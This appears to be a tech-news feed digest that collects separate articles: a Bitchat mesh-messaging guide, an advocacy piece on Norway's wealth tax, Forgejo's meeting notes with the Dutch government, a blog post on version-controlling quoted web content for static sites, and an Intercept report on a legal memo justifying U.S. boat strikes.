T4P has evaluated the app, testing it in various conditions, and looked at the technology and governance of the application. After this evaluation, T4P recognizes it as a secure and resilient communication tool for Palestinian communities when faced with internet disruptions or outages. In addition, Tech for Palestine community members are among BitChat’s top code contributors.

Bitchat has seen a surge in downloads in countries facing civil unrest like Nepal, Indonesia, Côte d'Ivoire, and most recently Madagascar. The Nepali government blocked access to all major social media platforms, forcing civilians to search for alternative methods of communication.

WhatsApp is known to expose private data, potentially to Israel – and these breaches have been used to target Palestinians . Communicating via WhatsApp or social media presents the risk of exposing private data, limiting free expression, and undermining user privacy. BitChat does not have the same vulnerabilities and does not allow Meta to help Israel surveil Palestinians.

Get started

You can start using Bitchat easily, without even creating an account. To start, download the app from the App Store or Google Play store .

Once installed, the first thing you should do is change the default @anon username at the top. Click on it to change.

The blue #mesh channel in the top right corner will indicate that you are active on your local bluetooth network. Next to it you will see an icon with the number of users connected within your network. Click on the icon and begin private conversations with users from the list.

We recommend confirming your friends’ and family members’ usernames in person when possible. This helps make sure you’re talking to the right people and avoids confusion or impersonation. Once you’ve confirmed someone’s identity, you can start messaging them privately. You can also “favorite” them so they’re easy to find later.

Begin messaging by using the “type a message…” box. Type in a forward slash / to open the menu for additional commands and options.

Locations:

If you click on the blue #mesh channel on the top right it will open the various location channels available.

  • #mesh: The mesh channel is your local bluetooth network that extends as far as the number of connected devices using Bitchat. So the more users with the ability to relay over distance, the larger the network. This is the channel that will allow you to communicate when all other networks are down.
  • Location channels: You will see default channel names for your block, neighborhood, city, province, and region. These work best when connected to the internet.
  • #Geohash: the geohash channel is a custom channel that you can start to connect with your immediate family or local groups. Type in a name for your channel and click teleport. Users within your network can then join it.

Helpful tips:

  • We encourage you to clear your messages regularly with the command “/c”. This is good practice in case your phone is confiscated. Messages are only accessible on the device, as Bitchat has no central servers. If you delete the messages, they aren’t accessible anywhere.
  • Gaza Online provides renewable eSIMs to restore internet access across Gaza, helping people stay connected and access essential services. Paired with Bitchat, it can help communication continue even when networks are down.

Download Bitchat today and see additional tools that Tech for Palestine has been working on.

Stay connected, stay safe.

Norway's Wealth Tax Unchains a Capital Exodus

Hacker News
citizenx.com
2025-11-14 17:39:35
Comments...
Original Article
Norway's Wealth Tax Unchains a Capital Exodus

Norway's wealth tax increase, expected to raise $146M, led to a $448M net loss as $54B in wealth left the country, reducing tax revenue by $594M.

The recent wealth tax increase in Norway was expected to bring in an additional $146M in yearly tax revenue.

Instead, individuals worth $54B left the country , leading to a lost $594M in yearly wealth tax revenue.

That's a net decrease of $448M+.

The mass departure of Norway's billionaires has transformed into an unprecedented exodus, as the nation's tax administration grapples with one of Europe's most demanding wealth tax and income tax rates. Last year marked a watershed moment in this capital flight, with more than NOK 600 billion in assets leaving the country as high-net-worth individuals increasingly opted for tax havens over their homeland.

The phenomenon has caught the attention of global media, with The Guardian and other outlets documenting the steady stream of super-rich Norwegians seeking refuge in more financially hospitable jurisdictions.

🇳🇴 The recent wealth tax increase in Norway was expected to bring an additional $146M in yearly tax revenue.

Instead, individuals worth $54B left the country, leading to a lost $594M in yearly wealth tax revenue.

A net decrease of $448M+ ↓ pic.twitter.com/9KTndm2BtZ

— CitizenX (@CitizenX) June 3, 2024

The architecture of the extensive Norwegian taxation system

Norway's approach to wealth taxation reflects a sophisticated yet burdensome system that interweaves multiple fiscal obligations.

Each municipality wields authority to levy its own tax rates, while the national government imposes additional charges on personal income, net worth, and various forms of capital.

The current structure encompasses property tax, value added tax, and capital gains tax, creating a comprehensive framework that has prompted many of the nation's wealthiest citizens to reconsider their residency.

The Wealth Tax Burden

The net wealth tax stands at the heart of this controversy. Unlike most OECD countries, which have abandoned such measures, Norway maintains a stringent wealth taxation system. While certain exemptions exist for business assets, the overall burden falls heavily on those with significant net worth.

The valuation of assets for tax purposes, particularly real estate holdings, frequently generates friction between taxpayers and the tax administration, as disagreements arise over assessment methods and fair market determinations.

The Flight of Capital

Norwegian entrepreneurs and billionaires face particularly galling challenges under this tax regime.

The wealth tax rate, combined with dividend tax, often forces business owners to withdraw substantial funds from their companies solely to meet tax obligations. This creates a destructive cycle that hampers business growth and reduces incentives for domestic investment.

The situation becomes even more complex when you consider the exit tax regulations, which insidiously attempt to capture value from departing residents.

Consider the case of one prominent industrialist who faced an annual tax bill of NOK 175 million despite drawing a relatively modest salary from his business operations.

Such disparities between paper wealth and liquid assets have driven many wealthy Norwegians to seek alternatives abroad, with Switzerland emerging as a preferred destination.

The European Context

The contrast with neighboring countries is notable. Not every EU and EU-adjacent country is taking the same approach as Norway and France .

Sweden, once renowned for its high wealth taxes, abandoned such levies years ago, recognizing their potential to drive away capital and talent. Finland and Denmark have similarly opted for different approaches to taxing their wealthy citizens.

Spain remains one of the few European nations maintaining a wealth tax, though its system offers more flexibility through regional variations and exemptions.

The Swiss Alternative

Switzerland's cantons have become particularly attractive to Norway's departing wealthy.

With its favorable tax base and various cantonal incentives, Swiss municipalities offer attractive alternatives to Norway's rigid system.

Cities like Lucerne actively court Norwegian expatriates, creating communities of former Nordic residents who share similar tax-driven motivations for relocation. The absence of inheritance tax in many Swiss regions provides an additional draw for family businesses considering relocation.

Real Estate and Asset Valuation

The treatment of real estate under Norway's wealth tax system presents particular challenges. Property valuations can vary significantly between tax assessment and market value, creating additional complexity for wealthy individuals with substantial real estate holdings.

This disparity affects both residential and commercial property owners, often forcing them to maintain higher cash reserves solely for tax purposes.

Economic Impact and Policy Response

The Norwegian tax administration faces difficult choices as it watches its tax base erode. While property tax and value added tax provide stable revenue streams, the exodus of billionaires threatens significant portions of the government's income.

Recent estimates suggest that departing wealthy individuals control combined fortunes of at least NOK 600 billion - capital that now resides beyond Norway's borders.

Exit Tax Considerations

The government's response has largely focused on tightening exit tax regulations rather than addressing the underlying causes of departure.

New provisions require departing residents to pay taxes on unrealized gains, with payment periods extending up to twelve years. This approach risks accelerating the exodus as wealthy individuals rush to relocate before new restrictions take effect. Austria, another European nation grappling with similar challenges, watches Norway's experience closely as it considers its own wealth tax policies.

The global context and Future Implications

In the broader context of international tax competition, Norway's experience offers crucial lessons about the limits of national tax sovereignty in an era of mobile capital.

While some European nations maintain certain wealth-linked taxes, most have moved toward more flexible systems that acknowledge the reality of global competition for high-net-worth individuals and their investments.

The pressure from tax havens and the mobility of modern capital pose existential challenges to conventional tax policies.

This dynamic particularly affects countries with high wealth tax rates, as they compete not only with traditional low-tax jurisdictions but also with nations offering specialized incentives for wealthy immigrants.

This is why obtaining second citizenship and multiple passports is a crucial diversification strategy in the modern world. Many investors are exploring options like Citizenship by Investment in Argentina to add geographic and legal flexibility to their planning.

Social Implications and Public Debate

The exodus has sparked intense public discourse about social equity and economic incentives. Each tax return season brings fresh reminders of wealthy departures, while policy makers search for ways to maintain public services without driving away the very taxpayers who contribute most to their funding.

Norway’s Wealth Tax and the Founder Exodus @Jason , @alex and @Dune CEO Fredrik Haga discuss how Norway’s wealth tax on unrealized gains is forcing many founders to leave the country, as the policy creates overwhelming financial burdens for startups.

• The Tax Burden: Norway's… pic.twitter.com/h0zkIllAPw

— This Week in Startups (@twistartups) November 26, 2024

Supporters of the current system argue that wealth taxes play a crucial role in maintaining Norway's social democratic model.

Critics counter that driving away successful entrepreneurs ultimately undermines the tax base needed to support social programs.

This debate extends beyond simple fiscal considerations to fundamental questions about the nature of social contracts in an age of global mobility.

Looking Forward

As Norway grapples with these challenges, its experience resonates far beyond its borders. Other OECD countries watch developments closely, recognizing that Norway's wealth tax experiment may shape global tax policy discussions for years to come.

With billions of NOK in assets already relocated and more wealthy individuals considering departure, the pressure for reform continues to mount.

The story of Norway's wealth tax thus represents more than a simple tale of tax rates and capital flight. It embodies fundamental questions about the survival of progressive taxation in a world where capital moves freely across borders.

As the exodus continues, these questions become increasingly urgent, not just for Norway but for all nations seeking to fund robust social services while remaining attractive to mobile wealth and talent.

Meeting notes between Forgejo and the Dutch government via Git commits

Hacker News
codeberg.org
2025-11-14 17:35:17
Comments...
Original Article
#import "@preview/flow:0.3.2": *
#show: note.with(
  title: "Forgejo Dutch Government call notes",
  jitsi: [https://meet.jit.si/ForgejoOSPObzk],
  start: "2025-11-11 14:00",
  end: "15:00",
  protocol: (contributors: (
    "multisn8",
    "n0toose",
    "oliverpool",
  )),
)
#pagebreak(weak: true)
= Introduction round
/ Gina : Gi
- Ministry of the interior
- Goal: More open-source
- OpenDesk already is in Germany, now also in Netherlands
- Short-term goal: Setting up a code platform
- This call
- Figuring out how governments can _help_ Forgejo! yay :3
- Do also work together with the French government
/ Gusted : Gu
- Basically a Forgejo contributor since its inception. Also: Computers. Since a long time.
- Forgejo has no higher "level" than contributor
/ oliverpool : O
- Forgejo contributor
- Would enjoy having paid OSS missions to sell to his employer
- Has had contact with French ministry of education: Want to use Forgejo, too
- want to move away from GitLab community edition
- some paid features cannot be accepted as contributions to the community edition
- are considering Forgejo
- but the gitlab-pages migration is not easy
- (Context for protocol: Also made contributions to the notes after the meeting took place.)
/ Multi : M
- just takes notes lol
/ n0toose : N
- Forgejo contributor
- (note taker's audio feed was interrupted, *N* cannot remember what was said.)
- (Context for protocol: Also made contributions to the notes after the meeting took place.)
= Pronunciation
/ N : Whatever (joke)
/ Gu : Forgejo with a silent R
- Coming from Esperanto
= What is Forgejo about?
/ O : Important part of Forgejo: Community and federation
- Federation is _not_ developed by the ones present here
/ Gi : Non-centralized power
- Is also on Codeberg
= Agenda
/ Gi : What the Dutch government...
+ *wants from* Forgejo
+ *can do for* Forgejo
= What the Dutch government wants from Forgejo
/ Gi :
- So far, nothing that isn't already present
- Except: CI
== CI
/ Gu : Supports a lot of CI runners
- Forgejo Actions is built-in
- Reimpl of GH Actions from scratch
- Still in dev: Works towards feature-parity
- Limitations already visible though
- Difficult with more complex pipelines
/ Gi : How easy is adding features?
- Both code and requests?
/ Gu : Easy enough
- "I think as long as there's a use case, it will be accepted"
- Architecture makes it easy enough
/ O : Written in Go, quite approachable
- Expect all contributions to be tested
- Maintainers help out with getting a feature there though!! :3
- Contribution acceptance depends on inherent maintenance effort
- Don't want features that must be dropped after 3 months due to lack of maintenance
- Other CIs can work with Forgejo as well.
- SourceHut: Can trigger CI runs quite easily
- https://codeberg.org/emersion/yojo -- bridge between Sourcehut and Forgejo
- Woodpecker
== Volunteers vs. commercial interests
/ Gi : Are you entirely volunteer-based?
/ N : Depends on who "you guys" (Context: this meeting's attendees or Forgejo's contributors) is
- Even if a contributor works on behalf of a company, the assumption is that their contributions are treated like any other's. "We" expect that we can work together, instead of a mere "push and forget" approach.
- Hard part of contributions are tests and maintenance
- Symbiotic relationship is _necessary_
- *Gu* : Expect maintenance and availability for questions if code is added
- Companies are contributing, too!
- They don't always say it out loud though ^^
/ Gi : Is there any payment structure?
/ O : Individual entities have NLnet grants
- Codeberg has some, too
== Forgejo <> Gitea relation
/ Gi : How does Forgejo relate to Gitea?
/ N : (jokingly) We went "solo".
/ Gu :
- In inception: Soft fork
- A year ago: Hard fork (after final rebase)
- Since then, cherry-picking
- No relationship with Gitea anymore except for past commit history
/ O : https://forgejo.org/2024-02-forking-forward/
- No relation except for security releases
- Attempts at cooperation and coordination did not work out qwq
== Experience with large institutions/governments
/ Gi : Have you worked with governments before?
/ Gu : No
- Contributors tell in private or present publicly that they are in a company
- But always individuals
- Except for Linux distros
/ Gi : Do you get support requests from them?
/ Gu : Yes, but usually rather technical questions
- e.g. "Why is this slow?", "How can I profile this?"
- Result in issues like any other
/ O :
- Forgejo Actions: Pushed by individual contributors
- Federation: Pushed by company
- Apart from that: Smaller stuff
- 1 contributor "suffices" for each
=== Support contracts/obligations
/ Gi :
- Not worried about features
- Worried about having to provide support though
- Unsure if 3rd party support contract would be necessary
/ Gu : Companies figure out in #emoji.sparkles some way #emoji.sparkles
[ Another forgejo contributor joins and leaves ]
/ O : https://codeberg.org/forgejo/professional-services/issues
- Companies can request and offer services there
- Each company has to decide for themselves if they need them
[ Another forgejo contributor joins and leaves ]
[ Another forgejo contributor joins ]
== Concerns about working together with a government
/ Gi : Are there any concerns about a government starting to use the project?
/ N : We need to figure some questions (i.e. scaling) before that, "we can figure things out as we go"
- Very often, a large organization might start using Forgejo and stumble upon issues after the fact.
/ Gu : OSS: Some contributors may not be excited/positive as far as governments are concerned
- Others treat them as "yet another organization".
[ Another forgejo contributor leaves ]
/ Gi : Fair! Governments have not fulfilled that symbiotic pact in the past
- only "taking", but not "giving back" as much.
== Dedicated scaling talk
/ Gi :
- We're starting a pilot! #emoji .confetti
- Would be cool to talk dedicatedly about scaling
- Could we set that up?
/ N : (half-jokingly) "I nominate gusted"
/ Gu : I do infra for Codeberg, so I'd be the right one for this
/ O : 👏
/ Gi : Phrasing it carefully to avoid draining energy
- Gusted would be a great first start
/ N : Work to use Forgejo as a cluster: https://codeberg.org/forgejo/discussions/issues/259
== Funding
/ Gi : Is NLnet and Codeberg all funding you receive?
/ N : No
- Haven't had financial transparency reports in the past
- Primary source: donations, (single-time, memberships)
- Would have to check in with the other Codeberg entities first
- (Context: There was a mild misunderstanding with the _you_ , so the answer was "on behalf of Codeberg" and not on behalf of Forgejo).
- Mentions of how some organizations/companies can "contribute back to Forgejo" by allocating human resources.
/ Gu : Codeberg is freely allocating funds for Forgejo
/ O : Complimentary with different goals
- Forgejo: Develop Forgejo
- Codeberg: Moderation, promote open source, have an OSS code platform, ...
[ Another forgejo contributor joins ]
= How could a government help Forgejo?
/ Gi : Broadly asking: If a government wants to support you, how could they do it?
- Developers?
- Funds?
- Hardware?
/ O :
- Funds: Complicated with tax paperwork and legal issues though
- People interested in contributing: Easier + more effective
/ Gi :
- Actually glad: Money is hard to move in governments
== Federation
/ Gi :
- How is the federation work going?
/ N : Lots of work
- Plugging a lot of things out and back in, tech debt over several projects
- Cannot make any guarantees
- More pressure is bad
- TL;DR: It's slow, but going. It's complicated.
/ Gi : Impressed with the ambition, understand that it's hard
/ N : The goal is to move from having "yet another single point of failure" (i.e. SourceForge, then GitHub, then Codeberg, etc.)
- "Just gonna take a while"
/ Gi : Basic plan: Want to have our own instance
- Would be cool to federate though!
- Use OpenID connect login
- Technical details though
- Happy to hear you're open for collaboration!
/ N : Everyone (companies, governments, big instances like Codeberg's, etc.) benefits! ^^
= Closing questions
== Code of Conduct
/ M : How would CoC work with government projects like this?
/ Gi : Individual projects figure that out -- we don't have experience with OSS yet
== Keeping in touch
/ Gi : How can we keep in touch?
/ O : If you have a CB account, you can comment on https://codeberg.org/forgejo/discussions/issues/412
- Easier to work with if it's in public
== Protocol confirmation
/ N : Are you okay with this protocol being public?
/ Gi : Yes, I am
== Motivation for Dutch government to contact Forgejo
/ Gi : This a good start, are there any questions?
/ Gu : What was the primary motivation for switching away from proprietary platforms?
/ Gi : ICC having their MS accounts blocked
- Made them very aware of ecosystem fragility
- Looked at their dependencies and alternatives
- Digital sovereignty: Hot topic ^^
== Next steps
/ O : What would be the next step?
/ Gi : (mentions of red tape/bureaucracy that has to be dealt on OSPO's end)
- Seeing how this can work out with e.g. different departments.
- 80% bureaucracy, 20% actual stuff.
- Seeing how we can contribute back to you (and other projects).
- "Lots of work on our part!"

Version Control External Content Referenced in Your Blog

Lobsters
lgug2z.com
2025-11-14 17:34:59
Comments...
Original Article

It seems like most blogs I read these days are built using a static site generator (SSG).

Some of these SSGs come with shortcodes for embedding content from popular websites, others don't, but shortcodes are generally the accepted way of embedding a reference to something someone else said on the internet in one of your posts.

I recently wrote about how brittle I find these shortcodes that call out to external websites, and instead wrote One Shortcode to Rule Them All which references things directly from my own personal knowledge base.

But we can still do better.

@LGUG2Z I wish that SSGs would store the data from the remote URL in a file you could keep under version control. e.g., for tweets, I do something like {{<tweet id="12345">}} and on first build, it downloads the profile image, name, tweet content, and timestamp and renders that, and it works forever.

I keep finding broken tweets on my Hugo site because Twitter's rate limiting something or the user deleted their tweet. I've resorted to just screenshotting, which feels sloppy.

Michael is on to something... Embedding his comment here didn't trigger a HTTP request when this article was built!

This is also something that I have thought about before, but writing a middleware layer to cache referenced content from disparate sources to plug in to SSG codebases I'm not really familiar with was never an idea that really pulled me in.

I too had previously resorted to screenshotting and embedding images, but that process doesn't feel good, and I don't like adding more and more image files to my git repo. My requirements are also a bit simpler because I don't really care about rendering a user's profile picture from an external site or showing a timestamp.

Since I'm now pulling in all my quoted external content from a single data source, I can implement a pre-build step which will allow me to version control all of the external content referenced in my articles. I just need three things:

  1. A list of sources
# sources

https://m.mtlynch.io/@michael/115538492543985760
  2. A file which maps those sources to the data required to render them
// library.json
{
  "https://m.mtlynch.io/@michael/115538492543985760": {
    "title": "michael",
    "source_display": "m.mtlynch.io",
    "source_url": "https://m.mtlynch.io/@michael/115538492543985760",
    "content": "@LGUG2Z I wish that SSGs would store the data from the remote URL in a file you could keep under version control. e.g., for tweets, I do something like `{{<tweet id=\"12345\">}}`  and on first build, it downloads the profile image, name, tweet content, and timestamp and renders that, and it works forever.\n\nI keep finding broken tweets on my Hugo site because Twitter's rate limiting something or the user deleted their tweet. I've resorted to just screenshotting, which feels sloppy."
  }
}
  3. A shortcode which can look up and render the data using the source URL
<!-- library.html -->

{% if url %}
    {% set library = load_data(path="library.json") %}
    {% set quote_data = library | get(key=url) %}

    <div class="notado-quote"
         style="border: 1px solid var(--border-color);
                background-color: var(--bg-primary) !important;
                position: relative;
                margin-block: 1em;
                border-radius: 5px;
                padding-left: 1rem;
                padding-right: 1rem;
                padding-top: 1.25rem;
                padding-bottom: 1.25rem;
                {% if caption %} margin-bottom: 0em;
                border-bottom-right-radius: 0px !important;
                border-bottom-left-radius: 0px !important;
                {% endif %}">

        <div style="padding-bottom: 1.25rem">
            <div style="display: flex; gap: 0.75rem">
                <div style="min-width: 0;
                            flex: 1 1 0%;
                            display: flex;
                            flex-direction: column;
                            justify-content: center">
                    <p style="text-overflow: ellipsis;
                              overflow: hidden;
                              white-space: nowrap;
                              margin: 0em">
                        {{ quote_data.title }}
                    </p>
                    <p style="color: var(--text-1); margin: 0em">
                        {% if quote_data.source_url %}
                            <a href="{{ quote_data.source_url }}">{{ quote_data.source_display }}</a>
                        {% else %}
                            {{ quote_data.source_display | split(pat=" - ") | first }}
                        {% endif %}
                    </p>
                </div>

                <div style="flex-shrink: 0;
                            display: flex;
                            flex-direction: row-reverse;
                            align-items: center">
                    <a class="notado-icon" href="https://notado.app" style="border: none">
                        <img style="height: 3rem;
                                    width: 3rem"
                             src="https://notado.app/static/notado-icon.png"
                             alt="notado" />
                    </a>
                </div>
            </div>
        </div>

        {# djlint:off #}
        <div>{{ quote_data.content | markdown(inline=true) | safe }}</div>
        {# djlint:on #}
    </div>

    {% if caption %}
        <div class="notado-quote-caption"
             style="border: 1px solid var(--border-color);
                    background-color: var(--bg-2) !important;
                    position: relative;
                    margin-bottom: 1em;
                    border-bottom-left-radius: 5px;
                    border-bottom-right-radius: 5px;
                    padding-left: 1rem;
                    padding-right: 1rem;
                    padding-top: 0.5rem;
                    padding-bottom: 0.5rem">
            {{ caption }}
        </div>
    {% endif %}
{% endif %}

The first two pieces are the really interesting ones.

I maintain a CLI tool for my knowledge base which I extended with a command which takes a list of source URLs and updates a library file.

❯ notado-cli quote-gen
Adding quote data for https://bsky.app/profile/hmsnofun.bsky.social/post/3lmr6sm5k4k2b to library.json
Adding quote data for https://defcon.social/@corbden/113473397794111625 to library.json
Adding quote data for https://discourse.nixos.org/t/should-organizations-relating-to-the-defense-sector-being-able-to-sponsor-nixos/41252/6 to library.json
Adding quote data for https://lobste.rs/s/rzskjk/i_think_i_m_done_thinking_about_genai_for#c_l9x7we to library.json
Adding quote data for https://old.reddit.com/r/patientgamers/comments/udzo11/i_miss_the_days_of_server_browsers_and_community/i6lga1o/ to library.json
Adding quote data for https://programming.dev/comment/5789966 to library.json
Adding quote data for https://tildes.net/~tech/17xe/permanent_archival_formats_do_they_exist#comment-9feo to library.json
Adding quote data for https://twitter.com/mitchellh/status/1744850961309597855?s=12 to library.json
Adding quote data for https://www.youtube.com/watch?v=k0J0Dxf5JKc&lc=Ugwsmg7c0JpYiXyADQV4AaABAg to library.json

Whenever a new source is added and the command is run again, requests will only be made to fill in the library file with new data:

❯ notado-cli quote-gen
Skipping https://bsky.app/profile/hmsnofun.bsky.social/post/3lmr6sm5k4k2b as data is already in library.json
Skipping https://defcon.social/@corbden/113473397794111625 as data is already in library.json
Skipping https://discourse.nixos.org/t/should-organizations-relating-to-the-defense-sector-being-able-to-sponsor-nixos/41252/6 as data is already in library.json
Skipping https://lobste.rs/s/rzskjk/i_think_i_m_done_thinking_about_genai_for#c_l9x7we as data is already in library.json
Adding quote data for https://m.mtlynch.io/@michael/115538492543985760 to library.json
Skipping https://news.ycombinator.com/item?id=41841873 as data is already in library.json
Skipping https://old.reddit.com/r/patientgamers/comments/udzo11/i_miss_the_days_of_server_browsers_and_community/i6lga1o/ as data is already in library.json
Skipping https://programming.dev/comment/5789966 as data is already in library.json
Skipping https://tildes.net/~tech/17xe/permanent_archival_formats_do_they_exist#comment-9feo as data is already in library.json
Skipping https://twitter.com/mitchellh/status/1744850961309597855?s=12 as data is already in library.json
Skipping https://www.youtube.com/watch?v=k0J0Dxf5JKc&lc=Ugwsmg7c0JpYiXyADQV4AaABAg as data is already in library.json

In order to make diffs more pleasant after updates to the library file, I decided to serialize it using a BTreeMap so that the serialized JSON object will be sorted alphabetically by the URL keys.
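
The CLI itself is the author’s own tool (the BTreeMap mention suggests it’s written in Rust), but the pre-build step is simple enough to sketch. Here is a rough Python equivalent of the same idea, with the actual fetching stubbed out since it depends on each source platform’s API; the sort_keys flag plays the role of the BTreeMap, keeping diffs stable.

# quote_gen_sketch.py — not the real notado-cli, just the shape of the idea
import json
from pathlib import Path

SOURCES = Path("sources.txt")   # one URL per line; lines starting with "#" ignored
LIBRARY = Path("library.json")

def fetch_quote_data(url: str) -> dict:
    # Placeholder: a real implementation would call each platform's API
    # (Mastodon, Bluesky, etc.) to pull the title, display name, and content.
    return {"title": "", "source_display": "", "source_url": url, "content": ""}

def main() -> None:
    library = json.loads(LIBRARY.read_text()) if LIBRARY.exists() else {}
    for line in SOURCES.read_text().splitlines():
        url = line.strip()
        if not url or url.startswith("#"):
            continue
        if url in library:
            print(f"Skipping {url} as data is already in {LIBRARY}")
            continue
        print(f"Adding quote data for {url} to {LIBRARY}")
        library[url] = fetch_quote_data(url)
    # sort_keys=True keeps the URL keys alphabetical, so reruns produce clean diffs
    LIBRARY.write_text(json.dumps(library, indent=2, sort_keys=True) + "\n")

if __name__ == "__main__":
    main()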

With all these pieces in place, I can call my new shortcode to render this data without making any outgoing HTTP requests at build-time... Just like I did earlier in this article!

{{
  library(
    url="https://m.mtlynch.io/@michael/115538492543985760",
    caption="Michael is on to something... Embedding his comment here didn't trigger a HTTP request when this article was built!"
  )
}‌}

One of my greatest pleasures in life is building my own tools which work the way that I want them to work.

The initial feeling of gratification upon their completion soon fuels even more creativity in me as I slowly uncover new ways to integrate all of the different tools that I have built to target more and more of the papercuts that are just waiting to be addressed in the background of my life.


If you have any questions or comments you can reach out to me on Bluesky and Mastodon .

If you're interested in what I read to come up with solutions like this, you can subscribe to my Software Development RSS feed .

If you'd like to watch me writing code while explaining what I'm doing, you can also subscribe to my YouTube channel .

If you would like early access to komorebi for Mac , you can sponsor me on GitHub .

Secret Boat Strike Memo Justifies Killings By Claiming the Target Is Drugs, Not People

Intercept
theintercept.com
2025-11-14 17:28:25
In a memo promising legal immunity for those who kill alleged drug traffickers, the Trump administration floated an unusual legal theory. The post Secret Boat Strike Memo Justifies Killings By Claiming the Target Is Drugs, Not People appeared first on The Intercept....
Original Article

The Trump administration is promising legal cover for military personnel who carry out lethal attacks on the alleged drug smugglers in the waters surrounding Latin America.

Amid mounting questions from senior military and civilian lawyers about the legality of proposed strikes on civilian boats, the Justice Department’s Office of Legal Counsel this summer produced a classified opinion intended to shield service members up and down the chain of command from prosecution, according to three government officials.

The legal theory advanced in the finding, two sources said, differs from some of President Donald Trump’s public statements on the killings. It claims that narcotics on the boats are lawful military targets because their cargo generates revenue for cartels whom the Trump administration claims are in armed conflict with the U.S.

One senior defense official, speaking on the condition of anonymity, blasted the opinion. “I don’t know what’s more insane – that the ‘President of Peace’ is starting an illegal war or that he’s giving a get out of jail free card to the U.S. military,” said the official, referencing President Donald Trump’s self-proclaimed moniker . “Hopefully they realize there’s no immunity for war crimes. Nor is there a statute of limitations.”

The Trump administration continues to keep the OLC memo from the American people but, this week, finally allowed members of Congress and their staffs to read the document. On Wednesday, just 20 copies were made available in a secure room, causing delays among lawmakers and staffers who have been waiting months to understand the legal reasoning underpinning the attacks.

On Thursday evening, War Secretary Pete Hegseth said that the campaign of attacks is called Operation Southern Spear. Led by Joint Task Force Southern Spear and Southern Command, “this mission defends our Homeland, removes narco-terrorists from our Hemisphere, and secures our Homeland from the drugs that are killing our people,” he wrote on X. Southern Spear kicked off earlier this year as part of the Navy’s next-generation effort to use small robot interceptor boats and vertical take-off and landing drones to conduct counternarcotics operations.

The military has carried out 20 known attacks, destroying 21 boats in the Caribbean Sea and eastern Pacific Ocean since September, killing at least 80 civilians. The most recent attack, on a vessel in the Caribbean on Monday, first reported by CBS on Thursday, reportedly killed four people. Following most of the attacks, Hegseth or Trump have claimed that the victims belonged to an unspecified designated terrorist organization, or DTO.

A list of DTOs, consisting of Latin American cartels and criminal organizations, is attached to the OLC opinion which claims that attacks on suspected drug traffickers in the Caribbean and Pacific are lawful and that personnel involved are immune from prosecution.

“The strikes were ordered consistent with the laws of armed conflict, and as such are lawful orders. Military personnel are legally obligated to follow lawful orders and, as such, are not subject to prosecution for following lawful orders,” a Justice Department spokesperson told The Intercept.

Experts in the laws of war and members of Congress say the strikes are illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence. The summary executions are a significant departure from standard practice in the long-running U.S. war on drugs , in which law enforcement arrested suspected drug smugglers .

Senior government attorneys questioned the legality of the strikes long before they began, sources told The Intercept. “I’m not surprised that civilian and military lawyers raised significant concerns with these strikes, given that they are manifestly unlawful even under the most permissive wartime legal frameworks government lawyers have deployed at any point in the past two decades,” Rebecca Ingber, a former State Department lawyer and law-of-war expert told The Intercept.

One current government official speaking anonymously, as well as Brian Finucane, a former State Department lawyer who is a specialist in counterterrorism issues and the laws of war, both drew specific attention to the fact that this summer — at the time the Defense Department officials were expressing reservations about the legality of summary executions of alleged drug smugglers — Trump signed a secret directive ordering the Pentagon to use military force against Latin American drug cartels he has labeled terrorist organizations.

“There was a policy desire for strikes at sea and there was pushback, potentially from Joint Staff and Southern Command, on those requests, both on policy grounds, but also on legal grounds,” said Finucane, now the senior adviser for the U.S. program at the International Crisis Group. “That seems to have generated two documents: this permission slip from OLC, blessing these actions as legal, and the directive from the White House basically telling DOD ‘No! You will develop these options.’”

Several government officials suggested to The Intercept that Rear Adm. Milton “Jamie” Sands III, head of Naval Special Warfare Command, was fired by Hegseth in August due to the admiral’s concerns about impending attacks on civilian vessels by Special Operations forces. Pentagon press secretary Kingsley Wilson denied the officials’ claims, and Sands did not respond to repeated requests by The Intercept for an interview.

Last month, Adm. Alvin Holsey — the chief of Southern Command — announced his retirement years ahead of schedule. “Never before in my over 20 years on the committee can I recall seeing a combatant commander leave their post this early and amid such turmoil,” said Rep. Adam Smith, D-Wash., the top Democrat on the House Armed Services Committee.

Current and former government officials familiar with the OLC opinion say that it relies on a theory for the strikes that differs from the Trump administration’s public pronouncements. “Every single boat that you see that’s shot down kills 25,000 [Americans] on drugs and destroys families all over our country,” Trump said on “60 Minutes” recently . But the OLC opinion indicates that it is the sale of drugs, what is known as the “revenue generating target theory,” that the U.S. relies on to claim the narcotics aboard the boats are military objectives and, thus, lawful targets under the law of war. Under this theory, the civilians aboard would be considered collateral damage, and their deaths would be excused through a proportionality analysis tied to the military advantage gained by the attack.

Experts say the OLC reasoning is faulty and appears to have been fashioned to suit a political decision already made by the White House. While such theories have been employed before, such as ultimately fruitless strikes on drug labs in Afghanistan, they were in the context of actual armed conflicts against true belligerents, like the Taliban.

The OLC opinion also argues that, in conducting the attacks, the U.S. is coming to the collective self-defense of various Latin American countries, even if strikes are, in some cases, killing their nationals. “The Western Hemisphere is America’s neighborhood — and we will protect it,” Hegseth wrote in his Thursday Southern Spear announcement . Experts also say that such a unilateral decision, without a request from the nations being defended, is also unprecedented.

“It’s legal Mad Libs. They’re throwing all these terms and concepts at the wall.”

“It really strikes me that OLC was given an assignment. ‘We need a legal justification to do the following’ and then they just cooked something up. This is legal backfilling. ‘How do you lawyer your way to yes?’” said Finucane. “It’s legal Mad Libs. They’re throwing all these terms and concepts at the wall, but there’s no real content or substance behind them.”

The Intercept reported last month that the Trump administration secretly declared DTOs were in a state of “non-international armed conflict” with the United States during the summer, long before the attacks commenced. Despite concluding that the U.S. is involved in armed conflict, the OLC opinion nonetheless claims the operation is not covered by the War Powers Resolution, a 1973 law that requires presidents to terminate deployments of troops into “hostilities” after 60 days if Congress has not authorized them.

The OLC opinion, which runs nearly 50 pages, argues that these non-international armed conflicts are waged under the president’s Article II constitutional authority as commander in chief of the U.S. military, which is key to the argument that the strikes are permissible under domestic law.

The list of groups supposedly engaged in armed conflict with the United States, as The Intercept previously reported , includes the Venezuelan gang Tren de Aragua; Ejército de Liberación Nacional, a Colombian guerrilla insurgency; Cártel de los Soles, a Venezuelan criminal group that the U.S. claims is “headed by [Venezuelan President] Nicolas Maduro and other high-ranking Venezuelan individuals”; and several groups affiliated with the Sinaloa Cartel, according to two government sources who spoke to The Intercept on the condition of anonymity because they were not authorized to disclose classified information. The Justice Department, War Department, and White House have repeatedly failed to respond to requests for comment.

“I’ve seen no evidence or even allegations that suggest there has been an armed attack on the United States.”

